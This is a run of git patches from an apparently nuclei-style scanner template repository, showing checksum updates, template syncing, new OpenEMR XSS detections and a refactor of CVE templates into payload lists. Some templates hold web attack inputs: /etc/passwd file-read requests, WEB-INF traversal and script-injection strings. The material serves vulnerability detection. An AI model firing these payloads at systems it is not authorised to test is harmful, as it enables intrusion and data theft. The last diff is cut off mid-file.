+187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:16961f1485fbdc518ae463a9b48adaf9bbfe387f -cves.json-checksum.txt:afd2890005f74239b2e3d1c06cd58c0bcd65cfe3 +cves.json:87dbc83a3ff93181c8fd00e623d5b8621078ee53 +cves.json-checksum.txt:dd82c8a98acf147741107e510a128b53bb0bc30c dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3230,7 +3230,7 @@ http/cves/2024/CVE-2024-23334.yaml:c7735b96c11cb5fb87ede7ad978c21a2e2bb2bbe http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:970b706816344e71cfc971f7e2b69be44296cd81 http/cves/2024/CVE-2024-25735.yaml:f7694e6ddea1f334810c1f92161b65fe17c5881c -http/cves/2024/CVE-2024-26331.yaml:12ada85b036ed9da34f08dfa299a2f111b09e3da +http/cves/2024/CVE-2024-26331.yaml:b6da693b9295d093562406851e50dedfe5a136c9 http/cves/2024/CVE-2024-27198.yaml:2dd81bcb6348757082509db91768889a3725f1e2 http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d http/cves/2024/CVE-2024-27497.yaml:60398b33810f93340a2641b108c2ed83ed635e88 @@ -7737,6 +7737,7 @@ http/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml:4c http/vulnerabilities/other/qihang-media-disclosure.yaml:e6bb5960b1052e596d43bf3faf0abe3975c653b6 http/vulnerabilities/other/qihang-media-lfi.yaml:5179a2b7499e31740c7e5853134f540c4a9ae20a http/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml:93bfb8a42d56a33f2a5e98198809398d8959fec6 +http/vulnerabilities/other/quick-cms-sqli.yaml:2c0bb1b639b84f8dbb1f2182ebe76b798b290d8a http/vulnerabilities/other/rconfig-file-upload.yaml:baea5dfb06998b728d7ff9147698b3d812a8df14 http/vulnerabilities/other/reddittop-rss-xss.yaml:2b532fb620fd700b948d65dfc69227741e2adb07 http/vulnerabilities/other/rentequip-xss.yaml:f9841ce026f105a62494dac86be35464c59393ba @@ -8403,7 +8404,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:d84cb7561bbb4aca752f6e29c6891c7de06b703e +templates-checksum.txt:3ec87da4f2581e81ea484c401121e4c430cf465c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7915a87aaa0c6a815f44be8e00dbb20f45be2d9c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 12 Apr 2024 10:22:23 +0000 Subject: [PATCH 0075/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 56bbd8993b..ae688819b6 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -95,6 +95,7 @@ on: - 'code/cves/2024/CVE-2024-3094.yaml' - 'http/cves/2022/CVE-2022-0424.yaml' - 'http/cves/2024/CVE-2024-0337.yaml' + - 'http/cves/2024/CVE-2024-26331.yaml' - 'http/cves/2024/CVE-2024-2879.yaml' - 'http/cves/2024/CVE-2024-3273.yaml' - 'http/default-logins/allnet/allnet-default-login.yaml' @@ -117,6 +118,7 @@ on: - 'http/misconfiguration/thanos-prometheus-exposure.yaml' - 'http/technologies/citrix-xenmobile-version.yaml' - 'http/technologies/splunkhec-detect.yaml' + - 'http/vulnerabilities/other/quick-cms-sqli.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 0cb99722eb556eb34a98ef6f58564259cb3451ae Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 12 Apr 2024 15:52:38 +0530 Subject: [PATCH 0076/1768] updated name,tags --- http/exposed-panels/powerchute-network-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/powerchute-network-panel.yaml b/http/exposed-panels/powerchute-network-panel.yaml index 6ed468f0e8..12f2e0003d 100644 --- a/http/exposed-panels/powerchute-network-panel.yaml +++ b/http/exposed-panels/powerchute-network-panel.yaml @@ -1,14 +1,14 @@ id: powerchute-network-panel info: - name: PowerChute Network Shutdown - Panel + name: PowerChute Network Shutdown Panel - Detect author: DhiyaneshDK severity: info metadata: verified: true max-request: 1 shodan-query: html:"PowerChute Network Shutdown" - tags: panel,login,detect + tags: panel,login,powerchute,detect http: - method: GET From 0a1aa6d3d77ab41ab04edbc193deb26317b817e7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 12 Apr 2024 10:23:27 +0000 Subject: [PATCH 0077/1768] Auto Template Signing [Fri Apr 12 10:23:27 UTC 2024] :robot: --- http/vulnerabilities/other/quick-cms-sqli.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/other/quick-cms-sqli.yaml b/http/vulnerabilities/other/quick-cms-sqli.yaml index 170f03f93b..d21270d655 100644 --- a/http/vulnerabilities/other/quick-cms-sqli.yaml +++ b/http/vulnerabilities/other/quick-cms-sqli.yaml @@ -39,3 +39,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100e334653ae597ff1bd1cc87ee892f92fc7d955300ac91c5689d1c10a722cd8b4a022022ad5215230ff9c309d2c97066c3e492db92580033cf655c6826afc907ad00c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 7afccc4c656e9b0c4f0bfd9235a34a97043e67b1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 12 Apr 2024 10:30:06 +0000 Subject: [PATCH 0078/1768] Auto Generated New Template Addition List [Fri Apr 12 10:30:06 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 6c527b2dfd..1bbafea37f 100644 --- a/.new-additions +++ b/.new-additions @@ -103,10 +103,12 @@ http/exposed-panels/mitel-micollab-panel.yaml http/exposed-panels/mitric-checker-panel.yaml http/exposed-panels/ni-web-based-panel.yaml http/exposed-panels/outsystems-servicecenter-panel.yaml +http/exposed-panels/powerchute-network-panel.yaml http/exposed-panels/rtm-web-panel.yaml http/exposed-panels/suprema-biostar-panel.yaml http/exposed-panels/zenml-dashboard-panel.yaml http/exposures/apis/aspnet-soap-webservices-asmx.yaml +http/misconfiguration/apple-cups-exposure.yaml http/misconfiguration/dlink-unauth-cgi-script.yaml http/misconfiguration/helm-dashboard-exposure.yaml http/misconfiguration/intelbras-dvr-unauth.yaml From 03c3b8c2a610f190b4e53c4f3443c2ca7708e67e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 12 Apr 2024 10:30:12 +0000 Subject: [PATCH 0079/1768] Auto Generated Templates Checksum [Fri Apr 12 10:30:12 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 957d56c8f9..fdfbb4756e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4145,6 +4145,7 @@ http/exposed-panels/polycom-login.yaml:9dfb75c477c1d850cb3c4e767e5f1027c65c7e01 http/exposed-panels/portainer-panel.yaml:e3b502c10ccb719774f551f98c8676d5b60c0403 http/exposed-panels/posteio-admin-panel.yaml:8a464586f38dd15641c5023877f1528001dc2b7e http/exposed-panels/posthog-admin-panel.yaml:d7aa9e309340465b93e4c6a717c29ce0e26656c7 +http/exposed-panels/powerchute-network-panel.yaml:624d47c084df412ebe973ae411a1798340a6f93a http/exposed-panels/powercom-network-manager.yaml:0620116f3d782a315040023059c4dddae7b32065 http/exposed-panels/powerjob-panel.yaml:fe579283b3c05ba76936dc117496d2237a37de53 http/exposed-panels/powerlogic-ion.yaml:87eb50a95702f6bc36784264962cf9775bac39e7 @@ -7737,7 +7738,7 @@ http/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml:4c http/vulnerabilities/other/qihang-media-disclosure.yaml:e6bb5960b1052e596d43bf3faf0abe3975c653b6 http/vulnerabilities/other/qihang-media-lfi.yaml:5179a2b7499e31740c7e5853134f540c4a9ae20a http/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml:93bfb8a42d56a33f2a5e98198809398d8959fec6 -http/vulnerabilities/other/quick-cms-sqli.yaml:2c0bb1b639b84f8dbb1f2182ebe76b798b290d8a +http/vulnerabilities/other/quick-cms-sqli.yaml:387f55310a6e525c84460df3e0da4745ff453105 http/vulnerabilities/other/rconfig-file-upload.yaml:baea5dfb06998b728d7ff9147698b3d812a8df14 http/vulnerabilities/other/reddittop-rss-xss.yaml:2b532fb620fd700b948d65dfc69227741e2adb07 http/vulnerabilities/other/rentequip-xss.yaml:f9841ce026f105a62494dac86be35464c59393ba @@ -8404,7 +8405,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3ec87da4f2581e81ea484c401121e4c430cf465c +templates-checksum.txt:ed1a5bdf2896f60fa6a6a08c99fd206b72e4bb2a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e8265ef0af7010662efdf349e46f526b4fc08477 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 12 Apr 2024 10:30:55 +0000 Subject: [PATCH 0080/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ae688819b6..7ab7f49681 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -108,10 +108,12 @@ on: - 'http/exposed-panels/mitric-checker-panel.yaml' - 'http/exposed-panels/ni-web-based-panel.yaml' - 'http/exposed-panels/outsystems-servicecenter-panel.yaml' + - 'http/exposed-panels/powerchute-network-panel.yaml' - 'http/exposed-panels/rtm-web-panel.yaml' - 'http/exposed-panels/suprema-biostar-panel.yaml' - 'http/exposed-panels/zenml-dashboard-panel.yaml' - 'http/exposures/apis/aspnet-soap-webservices-asmx.yaml' + - 'http/misconfiguration/apple-cups-exposure.yaml' - 'http/misconfiguration/dlink-unauth-cgi-script.yaml' - 'http/misconfiguration/helm-dashboard-exposure.yaml' - 'http/misconfiguration/intelbras-dvr-unauth.yaml' From a63774c77edb62dcfe6a96f8b7ca07587db9d265 Mon Sep 17 00:00:00 2001 From: Ice3man Date: Fri, 12 Apr 2024 16:01:51 +0530 Subject: [PATCH 0081/1768] feat: convert paths with lots of elements to payloads --- http/cves/2013/CVE-2013-3827.yaml | 23 +- http/cves/2014/CVE-2014-2383.yaml | 25 +- http/cves/2014/CVE-2014-6271.yaml | 19 +- http/cves/2022/CVE-2022-48197.yaml | 21 +- http/cves/2023/CVE-2023-6379.yaml | 25 +- http/exposed-panels/openam-panel.yaml | 43 +-- http/exposed-panels/phpmyadmin-panel.yaml | 29 +- .../webeditors-check-detect.yaml | 37 +-- http/exposures/apis/swagger-api.yaml | 121 +++++---- http/exposures/backups/sql-dump.yaml | 45 ++-- http/exposures/configs/codeigniter-env.yaml | 27 +- http/exposures/configs/deployment-ini.yaml | 27 +- .../configs/git-config-nginxoffbyslash.yaml | 23 +- .../configs/github-workflows-disclosure.yaml | 57 ++-- http/exposures/configs/laravel-env.yaml | 47 ++-- http/exposures/configs/phpinfo-files.yaml | 53 ++-- .../configs/server-private-keys.yaml | 93 +++---- http/exposures/configs/zend-config-file.yaml | 29 +- http/exposures/files/routes-ini.yaml | 33 +-- http/exposures/files/shellscripts.yaml | 57 ++-- http/exposures/logs/error-logs.yaml | 61 +++-- .../aem/aem-default-get-servlet.yaml | 131 ++++----- .../misconfiguration/aem/aem-gql-servlet.yaml | 61 +++-- http/misconfiguration/aem/aem-misc-admin.yaml | 21 +- .../jolokia/jolokia-info-disclosure.yaml | 35 +-- .../phpmyadmin/phpmyadmin-server-import.yaml | 23 +- .../phpmyadmin/phpmyadmin-setup.yaml | 35 +-- http/technologies/graphql-detect.yaml | 251 +++++++++--------- .../telerik/telerik-dialoghandler-detect.yaml | 37 +-- http/vulnerabilities/generic/generic-env.yaml | 47 ++-- .../generic/generic-j2ee-lfi.yaml | 29 +- .../generic/generic-linux-lfi.yaml | 67 ++--- .../generic/generic-windows-lfi.yaml | 47 ++-- .../other/bitrix-open-redirect.yaml | 31 ++- .../wordpress-accessible-wpconfig.yaml | 63 ++--- 35 files changed, 939 insertions(+), 834 deletions(-) diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index 459352078f..70e13c6bd4 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -30,16 +30,19 @@ info: http: - method: GET path: - - "{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF" - - "{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - - "{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF" - - "{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - - "{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF" - - "{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - - "{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF" - - "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF" - - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + - "{{BaseURL}}{{paths}}" + payloads: + paths: + - "/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF" + - "/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + - "/faces/javax.faces.resource/web.xml?loc=../WEB-INF" + - "/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + - "/secureader/javax.faces.resource/web.xml?loc=../WEB-INF" + - "/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + - "/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF" + - "/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + - "/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF" + - "/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." stop-at-first-match: true diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index 5a670d5f91..d021db7995 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -34,17 +34,20 @@ info: http: - method: GET path: - - "{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd" - - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd" - - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - - "{{BaseURL}}/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - - "{{BaseURL}}/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - - "{{BaseURL}}/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd" - - "{{BaseURL}}/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - - "{{BaseURL}}/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - - "{{BaseURL}}/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - - "{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" + - "{{BaseURL}}{{paths}}" + payloads: + paths: + - "/dompdf.php?input_file=php://filter/resource=/etc/passwd" + - "/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd" + - "/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" + - "/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" + - "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" + - "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" + - "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd" + - "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" + - "/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" + - "/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" + - "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" stop-at-first-match: true diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml index 3285c6d48f..f18896cf9c 100644 --- a/http/cves/2014/CVE-2014-6271.yaml +++ b/http/cves/2014/CVE-2014-6271.yaml @@ -32,14 +32,17 @@ info: http: - method: GET path: - - "{{BaseURL}}" - - "{{BaseURL}}/cgi-bin/status" - - "{{BaseURL}}/cgi-bin/stats" - - "{{BaseURL}}/cgi-bin/test" - - "{{BaseURL}}/cgi-bin/status/status.cgi" - - "{{BaseURL}}/test.cgi" - - "{{BaseURL}}/debug.cgi" - - "{{BaseURL}}/cgi-bin/test-cgi" + - "{{BaseURL}}{{paths}}" + payloads: + paths: + - "" + - "/cgi-bin/status" + - "/cgi-bin/stats" + - "/cgi-bin/test" + - "/cgi-bin/status/status.cgi" + - "/test.cgi" + - "/debug.cgi" + - "/cgi-bin/test-cgi" stop-at-first-match: true diff --git a/http/cves/2022/CVE-2022-48197.yaml b/http/cves/2022/CVE-2022-48197.yaml index 5afec525f0..914b2c4311 100644 --- a/http/cves/2022/CVE-2022-48197.yaml +++ b/http/cves/2022/CVE-2022-48197.yaml @@ -32,15 +32,18 @@ info: http: - method: GET path: - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "{{BaseURL}}{{paths}}" + payloads: + paths: + - "/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" stop-at-first-match: true diff --git a/http/cves/2023/CVE-2023-6379.yaml b/http/cves/2023/CVE-2023-6379.yaml index 6bb0e87f02..d32ad73fd8 100644 --- a/http/cves/2023/CVE-2023-6379.yaml +++ b/http/cves/2023/CVE-2023-6379.yaml @@ -33,17 +33,20 @@ info: http: - method: GET path: - - '{{BaseURL}}/tagebuch/eintraege/index.html?reloaded&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - - '{{BaseURL}}/list-editor/index.html?reloaded&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - - '{{BaseURL}}/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - - '{{BaseURL}}/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - - '{{BaseURL}}/lists/compact/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - - '{{BaseURL}}/lists/elaborate/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - - '{{BaseURL}}/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - - '{{BaseURL}}/lists/masonry/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - - '{{BaseURL}}/blog/articles/index.html?reloaded&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - - '{{BaseURL}}/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1">", "List of tuitions")' + condition: and From a59f8747535cf63ce1ac564eeaf4148017963d3f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 23 Apr 2024 18:52:45 +0530 Subject: [PATCH 0281/1768] Create CVE-2023-2949.yaml --- http/cves/2023/CVE-2023-2949.yaml | 37 +++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/cves/2023/CVE-2023-2949.yaml diff --git a/http/cves/2023/CVE-2023-2949.yaml b/http/cves/2023/CVE-2023-2949.yaml new file mode 100644 index 0000000000..850c8f6dc9 --- /dev/null +++ b/http/cves/2023/CVE-2023-2949.yaml @@ -0,0 +1,37 @@ +id: CVE-2023-2949 + +info: + name: OpenEMR < 7.0.1 - Cross-site Scripting + author: ritikchaddha,princechaddha + severity: medium + description: | + Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.1. + reference: + - https://huntr.com/bounties/3842486f-38b1-4150-9f78-b81d0ae580c4 + - https://github.com/openemr/openemr/commit/af1ecf78d1342519791bda9d3079e88f7d859015 + - https://nvd.nist.gov/vuln/detail/CVE-2023-2949 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-2949 + cwe-id: CWE-79 + cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* + metadata: + vendor: open-emr + product: openemr + fofa-query: app="OpenEMR" + shodan-query: http.favicon.hash:1971268439 + tags: cve,cve2023,xss,openemr,open-emr + +http: + - method: GET + path: + - "{{BaseURL}}/interface/forms/eye_mag/js/eye_base.php?providerID=%3Cimg%20src=x%20onerror=alert(document.domain);%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header, "text/html")' + - 'contains_all(body, "", "openemr")' + condition: and From 120fd579681452b8e6935f2c659183675df61def Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 23 Apr 2024 18:52:53 +0530 Subject: [PATCH 0282/1768] Create CVE-2023-2948.yaml --- http/cves/2023/CVE-2023-2948.yaml | 37 +++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/cves/2023/CVE-2023-2948.yaml diff --git a/http/cves/2023/CVE-2023-2948.yaml b/http/cves/2023/CVE-2023-2948.yaml new file mode 100644 index 0000000000..d37dcc4123 --- /dev/null +++ b/http/cves/2023/CVE-2023-2948.yaml @@ -0,0 +1,37 @@ +id: CVE-2023-2948 + +info: + name: OpenEMR < 7.0.1 - Cross-Site Scripting + author: ritikchaddha,princechaddha + severity: medium + description: | + Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.1. + reference: + - https://huntr.com/bounties/3842486f-38b1-4150-9f78-b81d0ae580c4 + - https://github.com/openemr/openemr/commit/af1ecf78d1342519791bda9d3079e88f7d859015 + - https://nvd.nist.gov/vuln/detail/CVE-2023-2948 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-2948 + cwe-id: CWE-79 + cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* + metadata: + vendor: open-emr + product: openemr + fofa-query: app="OpenEMR" + shodan-query: http.favicon.hash:1971268439 + tags: cve,cve2023,xss,openemr,open-emr + +http: + - method: GET + path: + - "{{BaseURL}}/library/custom_template/share_template.php?list_id=1}});}}alert(1);function%20x(){if(1){a=({a:{a:1" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header, "text/html")' + - 'contains_all(body, "list_id: 1}});}}alert(1);", "select at least one Provider", "Save")' + condition: and From b5fba92e7c62d6b3b254782a472f05cdd7662ae8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 23 Apr 2024 18:55:48 +0530 Subject: [PATCH 0283/1768] Update bonobo-server-panel.yaml --- http/exposed-panels/bonobo-server-panel.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/bonobo-server-panel.yaml b/http/exposed-panels/bonobo-server-panel.yaml index a8210418d8..77112bad94 100644 --- a/http/exposed-panels/bonobo-server-panel.yaml +++ b/http/exposed-panels/bonobo-server-panel.yaml @@ -7,10 +7,10 @@ info: description: | Bonobo Git Server login panel was detected. metadata: - shodan-query: http.favicon.hash:-219625874 verified: true - max-request: 1 - tags: panel,bonobo,git,login + 